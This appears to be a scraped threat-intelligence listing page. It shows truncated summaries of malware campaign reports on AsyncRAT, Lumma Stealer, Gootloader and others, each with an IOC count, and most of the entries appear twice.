Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33